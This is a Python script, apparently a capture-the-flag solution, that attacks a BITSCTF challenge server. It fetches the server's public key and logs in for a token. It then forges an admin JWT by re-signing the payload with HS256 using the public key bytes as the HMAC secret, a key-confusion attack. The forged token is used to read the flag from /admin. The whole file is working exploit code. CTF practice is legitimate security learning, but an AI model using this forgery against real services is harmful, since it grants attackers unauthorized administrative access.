#!/usr/bin/env python3
import requests
import json
import base64
import hmac
import hashlib
import time
import re

def base64url_encode(data: bytes) -> bytes:
    return base64.urlsafe_b64encode(data).rstrip(b'=')

def base64url_decode(input_str: str) -> bytes:
    rem = len(input_str) % 4
    if rem:
        input_str += '=' * (4 - rem)
    return base64.urlsafe_b64decode(input_str)

def create_jwt(payload: dict, secret: bytes) -> str:
    """
    Create a JWT token with HS256 using the bytes of the secret.
    """
    header = {"alg": "HS256", "typ": "JWT"}
    header_json = json.dumps(header, separators=(',', ':')).encode('utf-8')
    payload_json = json.dumps(payload, separators=(',', ':')).encode('utf-8')
    header_b64 = base64url_encode(header_json)
    payload_b64 = base64url_encode(payload_json)
    signing_input = header_b64 + b'.' + payload_b64
    signature = hmac.new(secret, signing_input, hashlib.sha256).digest()
    signature_b64 = base64url_encode(signature)
    token = signing_input + b'.' + signature_b64
    return token.decode('utf-8')

def decode_jwt_payload(token: str) -> dict:
    parts = token.split('.')
    if len(parts) != 3:
        raise ValueError("Malformed JWT token")
    payload_b64 = parts[1]
    payload_json = base64url_decode(payload_b64)
    return json.loads(payload_json)

def extract_raw_key(pem: str) -> str:
    lines = pem.strip().splitlines()
    key_lines = [line.strip() for line in lines if not line.startswith("-----")]
    return "".join(key_lines)

def main():
    base_url = "http://chals.bitskrieg.in:3005"
    
    # Retrieve the public key
    pub_key_url = base_url + "/public-key"
    r = requests.get(pub_key_url)
    public_key_pem = r.text.strip()
    
    # Extract and decode the DER key
    raw_key_str = extract_raw_key(public_key_pem)
    der_key = base64.b64decode(raw_key_str)  # Decode base64 into DER bytes
    
    # Login to get the original token
    login_url = base_url + "/login"
    username = "mH4ck3r0n3"
    r = requests.post(login_url, json={"username": username})
    original_token = r.json().get("token")
    
    # Decode and modify the payload
    payload = decode_jwt_payload(original_token)
    payload["role"] = "admin"
    now = int(time.time())
    payload["iat"] = payload["iat"]
    payload["exp"] = now + 3600  # Update expiration time
    
    # Create the forged token with the DER key
    forged_token = create_jwt(payload, der_key)
    print(forged_token)
    # Try the admin endpoint
    admin_url = base_url + "/admin"
    headers = {"Authorization": "Bearer " + forged_token}
    print("\nFLAG: " +  re.search(r"BITSCTF\{.*?\}",requests.get(admin_url, headers=headers).text).group(0))

if __name__ == "__main__":
    main()
